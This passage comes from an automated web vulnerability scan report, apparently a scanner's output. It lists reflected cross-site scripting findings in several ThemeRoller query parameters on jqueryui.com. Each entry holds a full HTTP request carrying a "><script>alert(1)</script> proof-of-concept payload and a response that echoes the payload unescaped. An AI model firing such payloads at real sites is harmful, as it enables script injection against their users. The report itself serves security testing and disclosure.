/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png882e1"><script>alert(1)</script>07149fc06f1&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
onColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png882e1"><script>alert(1)</script>07149fc06f1&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHig
...[SNIP]...

3.32. http://jqueryui.com/themeroller/ [bgTextureContent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5322d"><script>alert(1)</script>f5d91b6353c was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png5322d"><script>alert(1)</script>f5d91b6353c&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png5322d"><script>alert(1)</script>f5d91b6353c&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault
...[SNIP]...

3.33. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 537a5"><script>alert(1)</script>3b59a1d1c81 was submitted in the bgTextureDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png537a5"><script>alert(1)</script>3b59a1d1c81&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
r=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png537a5"><script>alert(1)</script>3b59a1d1c81&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&ic
...[SNIP]...

3.34. http://jqueryui.com/themeroller/ [bgTextureError parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffe15"><script>alert(1)</script>b095b5c9bc8 was submitted in the bgTextureError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pngffe15"><script>alert(1)</script>b095b5c9bc8&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.pngffe15"><script>alert(1)</script>b095b5c9bc8&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgText
...[SNIP]...

3.35. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bee3"><script>alert(1)</script>07f42324772 was submitted in the bgTextureHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png8bee3"><script>alert(1)</script>07f42324772&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png8bee3"><script>alert(1)</script>07f42324772&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=2222
...[SNIP]...

3.36. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2587"><script>alert(1)</script>912a8c95f83 was submitted in the bgTextureHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.pngd2587"><script>alert(1)</script>912a8c95f83&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
er=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.pngd2587"><script>alert(1)</script>912a8c95f83&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=c
...[SNIP]...

3.37. http://jqueryui.com/themeroller/ [bgTextureHover parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ef80"><script>alert(1)</script>7d60f528328 was submitted in the bgTextureHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png1ef80"><script>alert(1)</script>7d60f528328&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:56 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
tent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png1ef80"><script>alert(1)</script>7d60f528328&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconC
...[SNIP]...

3.38. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1081b"><script>alert(1)</script>32da48d3a73 was submitted in the bgTextureOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png1081b"><script>alert(1)</script>32da48d3a73&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
olorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png1081b"><script>alert(1)</script>32da48d3a73&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadi
...[SNIP]...

3.39. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0e3d"><script>alert(1)</script>e48f9fe676e was submitted in the bgTextureShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngf0e3d"><script>alert(1)</script>e48f9fe676e&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 119976

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.pngf0e3d"><script>alert(1)</script>e48f9fe676e&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.40. http://jqueryui.com/themeroller/ [borderColorActive parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65cd7"><script>alert(1)</script>fc8cfd864d1 was submitted in the borderColorActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa65cd7"><script>alert(1)</script>fc8cfd864d1&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorH